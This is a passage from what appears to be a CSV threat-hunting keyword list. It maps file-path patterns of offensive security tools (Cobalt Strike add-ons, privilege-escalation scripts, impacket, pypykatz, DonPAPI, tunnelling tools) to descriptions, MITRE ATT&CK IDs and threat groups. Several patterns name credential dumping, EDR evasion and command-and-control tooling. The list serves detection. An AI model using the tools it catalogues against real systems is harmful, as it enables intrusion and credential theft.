T1591,N/A,N/A,N/A,Reconnaissance,https://github.com/franc-pentest/ldeep,1,1,N/A,N/A,3,219,26,2023-10-02T20:36:02Z,2018-10-22T18:21:44Z -*/ldeepDump*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation 
Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/LetMeOutSharp/*,offensive_tool_keyword,cobaltstrike,Project to enumerate proxy configurations and generate shellcode from CobaltStrike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/EncodeGroup/AggressiveProxy,1,1,N/A,10,10,139,26,2020-11-04T16:08:11Z,2020-11-04T12:53:00Z -*/lexmark-config.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/lgandx/Responder*,offensive_tool_keyword,icebreaker,Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment,T1110.001 - T1110.003 - T1059.003,TA0006 - TA0001 - TA0002,N/A,N/A,Credential Access,https://github.com/DanMcInerney/icebreaker,1,0,N/A,10,10,1175,168,2018-10-24T18:14:53Z,2017-12-04T03:42:28Z -*/lib/GHunt/*,offensive_tool_keyword,SocialPwned,SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.,T1596,TA0002,N/A,N/A,OSINT exploitation tools,https://github.com/MrTuxx/SocialPwned,1,1,N/A,N/A,9,800,93,2023-08-12T21:59:23Z,2020-04-07T22:25:38Z -*/lib/ipLookupHelper.py*,offensive_tool_keyword,cobaltstrike,Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. 
scanners through packet inspection and malleable profile correlation,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mgeeky/RedWarden,1,1,N/A,10,10,820,138,2022-10-07T14:05:25Z,2021-05-15T22:05:39Z -*/lib/msf/*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/libgobuster*,offensive_tool_keyword,gobuster,Directory/File DNS and VHost busting tool written in Go,T1595 - T1133 - T1110 - T1027 - T1132 - T1048,TA0010 - TA0001 - TA0006 - TA0005 - TA0011,N/A,N/A,Network Exploitation Tools,https://github.com/OJ/gobuster,1,1,N/A,N/A,10,8199,1120,2023-09-12T22:37:40Z,2014-11-14T13:18:35Z -*/liboffsetfinder64*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/LibSnaffle*,offensive_tool_keyword,Group3r,Find vulnerabilities in AD Group Policy,T1484.002 - T1069.002 - T1087.002,TA0007 - TA0040,N/A,N/A,AD Enumeration,https://github.com/Group3r/Group3r,1,1,N/A,N/A,5,488,47,2023-08-07T16:45:14Z,2021-07-05T05:05:42Z -*/LightsOut.git*,offensive_tool_keyword,LightsOut,Generate an obfuscated DLL that will disable AMSI & ETW,T1027.003 - T1059.001 - T1082,TA0005 - TA0002 - TA0004,N/A,N/A,Exploitation tools,https://github.com/icyguider/LightsOut,1,1,N/A,N/A,3,243,29,2023-06-09T10:39:36Z,2023-06-01T14:57:44Z -*/ligolo.git*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*/ligolo-ng*,offensive_tool_keyword,ligolo,ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve),T1071 - T1021 - T1573,TA0011 - TA0002,N/A,N/A,C2,https://github.com/sysdream/ligolo,1,1,N/A,10,10,1438,209,2023-01-06T19:49:22Z,2020-05-22T07:58:13Z -*/LinEnum.git*,offensive_tool_keyword,LinEnum,Scripted Local Linux Enumeration & Privilege Escalation Checks,T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018,TA0007 - TA0009 - TA0002 - TA0003 - TA0001,N/A,N/A,Privilege 
Escalation,https://github.com/rebootuser/LinEnum,1,1,N/A,N/A,10,6220,1947,2023-09-06T18:02:29Z,2013-08-20T06:26:58Z -*/LinEnum/*,offensive_tool_keyword,LinEnum,Scripted Local Linux Enumeration & Privilege Escalation Checks,T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018,TA0007 - TA0009 - TA0002 - TA0003 - TA0001,N/A,N/A,Privilege Escalation,https://github.com/rebootuser/LinEnum,1,1,N/A,N/A,10,6220,1947,2023-09-06T18:02:29Z,2013-08-20T06:26:58Z -*/linpeas.sh*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*/linpeas.sh*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*/linux_ldso_dynamic.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/linux_ldso_hwcap.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/linux_ldso_hwcap_64.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - 
TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/linux_offset2lib.c*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,0,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/linux-smart-enumeration.git*,offensive_tool_keyword,linux-smart-enumeration,Linux enumeration tool for privilege escalation and discovery,T1087.004 - T1016 - T1548.001 - T1046,TA0007 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/diego-treitos/linux-smart-enumeration,1,1,N/A,9,10,2924,535,2023-09-17T10:27:49Z,2019-02-13T11:02:21Z -*/linWinPwn*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/llmnr-resolve.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/lltd-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/load-assembly.py*,offensive_tool_keyword,mythic,Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Athena,1,1,N/A,10,10,137,32,2023-10-03T16:51:44Z,2022-01-24T20:44:38Z -*/LoadDllRemote.cs*,offensive_tool_keyword,WheresMyImplant,A Bring Your Own Land Toolkit that Doubles as a WMI Provider,T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071,TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/0xbadjuju/WheresMyImplant,1,1,N/A,10,10,286,66,2018-10-31T16:56:51Z,2017-09-22T19:40:40Z -*/loader/bypass.c,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*/loader/bypass.h,offensive_tool_keyword,donut,Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself,T1055 - T1027 - T1202,TA0002 - TA0003 ,N/A,Indrik Spider,Exploitation tools,https://github.com/TheWover/donut,1,1,N/A,N/A,10,2877,557,2023-04-26T21:11:01Z,2019-03-27T23:24:44Z -*/loader/x64/Release/loader.exe*,offensive_tool_keyword,cobaltstrike,A protective and Low Level Shellcode Loader that defeats modern EDR systems.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/cribdragg3r/Alaris,1,1,N/A,10,10,846,136,2021-11-01T05:00:43Z,2020-02-22T15:42:37Z -*/loadercrypt_*.php*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Malleable C2 Design and Reference Guide,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 
T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/BC-SECURITY/Malleable-C2-Profiles,1,1,N/A,10,10,224,42,2023-06-11T17:38:36Z,2020-08-28T22:37:09Z -*/local-exploits/master/CVE*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/LocalPotato.git*,offensive_tool_keyword,localpotato,The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.,T1550.002 - T1078.003 - T1005 - T1070.004,TA0004 - TA0006 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/decoder-it/LocalPotato,1,1,N/A,10,5,463,69,2023-02-12T18:39:49Z,2023-01-04T18:22:29Z -*/LocalPrivEsc/*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*/localroot/2.6.x/elflbl*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/localroot/2.6.x/h00lyshit*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/Locksmith.git*,offensive_tool_keyword,Locksmith,A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services,T1552.006 - T1222 - T1046,TA0007 - TA0040 - TA0043,N/A,N/A,Discovery,https://github.com/TrimarcJake/Locksmith,1,1,N/A,8,5,472,38,2023-10-02T02:29:08Z,2022-04-28T01:37:32Z -*/log4shell.py*,offensive_tool_keyword,monkey,Infection Monkey - An automated pentest tool,T1587 T1570 T1021 T1072 T1550,N/A,N/A,N/A,Exploitation tools,https://github.com/guardicore/monkey,1,1,N/A,N/A,10,6330,762,2023-10-03T21:06:53Z,2015-08-30T07:22:51Z -*/login_scanner*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,0,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/login-securite/DonPAPI*,offensive_tool_keyword,donpapi,Dumping DPAPI credentials remotely,T1003.006 - T1021.001,TA0006 - TA0008,N/A,N/A,Credential Access,https://github.com/login-securite/DonPAPI,1,1,N/A,N/A,8,731,94,2023-10-03T05:27:06Z,2021-09-27T09:12:51Z -*/logs/*/becon_*.log,offensive_tool_keyword,cobaltstrike,Cobaltstrike toolkit,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - 
Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/1135/1135-CobaltStrike-ToolKit,1,1,N/A,10,10,149,40,2021-03-29T07:00:00Z,2019-02-22T09:36:44Z -*/logs/beacon_log*,offensive_tool_keyword,cobaltstrike,A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/yanghaoi/CobaltStrike_CNA,1,1,N/A,10,10,402,78,2022-01-18T12:47:55Z,2021-04-21T13:10:11Z -*/lookupsid.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*/loot_default/*.exe*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/loot_default/*.ps1*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/loot_default/*.py*,offensive_tool_keyword,viperc2,viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration,T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560,TA0002 - 
TA0003,N/A,N/A,C2,https://github.com/FunnyWolf/viperpython,1,1,N/A,10,10,70,41,2023-09-28T09:00:55Z,2021-01-20T13:03:45Z -*/loot_finder*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/lpBunny/bof-registry*,offensive_tool_keyword,cobaltstrike,Cobalt Strike beacon object file that allows you to query and make changes to the Windows Registry,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - 
Mustang Panda - Chimera - APT29,C2,https://github.com/ausecwa/bof-registry,1,1,N/A,10,10,17,7,2021-02-11T04:38:28Z,2021-01-29T05:07:47Z -*/lsa_dump_*.txt*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,1,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*/lsass.DMP*,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,1,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*/lsass/beacon.h*,offensive_tool_keyword,cobaltstrike,Collection of CobaltStrike beacon object files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - 